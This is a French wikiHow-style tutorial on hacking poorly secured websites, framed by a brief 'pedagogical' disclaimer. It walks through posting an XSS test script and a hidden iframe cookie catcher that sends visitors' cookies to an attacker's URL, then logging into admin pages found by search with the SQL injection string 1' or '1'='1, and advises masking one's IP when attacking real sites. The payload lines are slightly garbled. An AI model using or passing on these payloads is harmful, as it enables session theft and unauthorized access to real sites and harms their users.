X
wikiHow est un wiki, ce qui veut dire que de nombreux articles sont rédigés par plusieurs auteurs(es). Pour créer cet article, 37 personnes, certaines anonymes, ont participé à son édition et à son amélioration au fil du temps.
Cet article a été consulté 180 730 fois.
Note : cet article est à vocation purement pédagogique, il permet soit d’aider les gens à apprendre le piratage, soit de leur expliquer comment opèrent les hackeurs pour être ensuite capable de mieux protéger leurs sites Web. Ce tutoriel vous donne les principales étapes à réaliser en vue d’accéder aux sites Web peu sécurisés.
Étapes
Méthode 1
Méthode 1 sur 3:Utiliser le script intersites (XSS)
Méthode 1
-
1Trouvez un site vulnérable sur lequel vous pouvez poster un contenu. Un forum est un bon exemple. Souvenez-vous que si le site est sécurisé, cela ne marchera pas.
-
2Allez sur Créer un message. Vous devrez taper des codes spéciaux qui permettront de capturer des données sensibles lorsqu’on clique dans le « post ».
- Vous devrez tester si le système est capable de filtrer votre code. Postez
<script>window.alert(« test »)</script>
Si une boite d’alerte apparait lorsque vous cliquez sur votre post, cela signifie que le site est vulnérable aux attaques.
- Vous devrez tester si le système est capable de filtrer votre code. Postez
-
3Créez et importez votre attrapeur de cookies. Le but de cette attaque est de capturer les cookies d’un utilisateur, ce qui vous permettra d’accéder à ses comptes de sites Web pour lesquels ses identifiants sont vulnérables. Vous aurez besoin d’un attrapeur de cookies qui permet de capturer les cookies visés et de les rediriger vers vous. Chargez l’attrapeur de cookies sur un site auquel vous avez accès et qui prend en charge le langage php.
-
4Postez un message avec votre attrapeur de cookies. Entrez un code spécifique dans le message qui servira ensuite à capturer les cookies et à les envoyer sur votre site. Vous devrez entrer quelques mots de texte après le code afin de réduire la suspicion et d’éviter que votre message soit effacé.
- Voici un exemple de code :
<iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location=
"YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>
- Voici un exemple de code :
-
5Utilisez les cookies collectés. Après les avoir collectés, vous pouvez utiliser à quelques fins que ce soient les informations des cookies qui doivent être stockées dans votre site Web.Publicité
Méthode 2
Méthode 2 sur 3:Exécuter une attaque par injection
Méthode 2
-
1Trouvez un site vulnérable. Vous devrez trouver un site vulnérable en sachant si l’identifiant de l’administrateur du site est facilement accessible. Essayez de faire une recherche Google sur admin login.asp.
-
2Connectez-vous en tant qu’administrateur. Entrez admin en nom d’utilisateur et utilisez l’une des différentes combinaisons de mots de passe. Cela peut être n’importe quel nombre, un exemple assez commun est 1' ou '1'='1.
-
3Soyez patient. Cette manœuvre nécessitera probablement plusieurs tentatives et vous ferez forcément quelques erreurs.
-
4Accédez au site Web. Vous pourriez éventuellement être capable de trouver une combinaison qui vous donne un accès administrateur à un site Web, en supposant que celui-ci est vulnérable.Publicité
Méthode 3
Méthode 3 sur 3:Se préparer à réussir
Méthode 3
-
1Apprenez un ou deux langages de programmation. Si vous voulez réellement apprendre à pirater des sites Web, vous devrez comprendre comment fonctionnent les ordinateurs et les autres technologies. Apprenez à utiliser les langages de programmation tels que Python ou SQL de façon à savoir mieux contrôler un ordinateur et identifier les vulnérabilités des systèmes.
-
2Apprenez les bases du HTML. Vous devrez également acquérir une bonne compréhension des langages HTML et JavaScript si vous souhaitez pirater des sites Web. L’apprentissage peut être long, mais il existe de nombreuses méthodes gratuites sur Internet qui vous faciliteront la tâche si vous avez la volonté de vous y mettre.
-
3Consultez des whitehats. Ce sont des hackeurs qui utilisent leurs capacités à des fins honnêtes, principalement pour mettre en évidence les failles de sécurité sur Internet et rendre la navigation plus sure pour n’importe qui. Si vous avez envie d’apprendre l’art du piratage pour ce genre de bonne raison ou si vous voulez simplement améliorer la protection de votre site Web, il peut être une bonne idée de contacter quelques whitehats pour vous aider.
-
4Faites des recherches à propos du piratage. Si vous souhaitez apprendre à pirater ou si vous souhaitez simplement vous protéger, vous devrez faire beaucoup de recherches. Il y a tellement de façons différentes de trouver les failles d’un site Web que vous devrez apprendre en permanence.
-
5Restez à jour. Parce que la liste des failles potentielles est en évolution permanente, vous devrez vous assurer que vous êtes à jour sur les techniques de piratage. Le fait d’être protégé d’un certain type de hack ne signifie pas que vous serez toujours en sécurité !Publicité
Conseils
- Allez sur des forums de hackeurs en vue de découvrir quelques astuces utiles.
Publicité
Avertissements
- Si vous comptez vous essayer au piratage dans le monde réel, masquez votre adresse IP en utilisant des logiciels adaptés disponibles en ligne.
- Le fait de lire cet article ne fait pas de vous un hackeur. Vous DEVEZ travailler vos compétences et pratiquer, pratiquer et encore pratiquer.
- Le piratage est illégal. Si vous vous faites attraper, vous êtes en faute.
Publicité
À propos de ce wikiHow
Publicité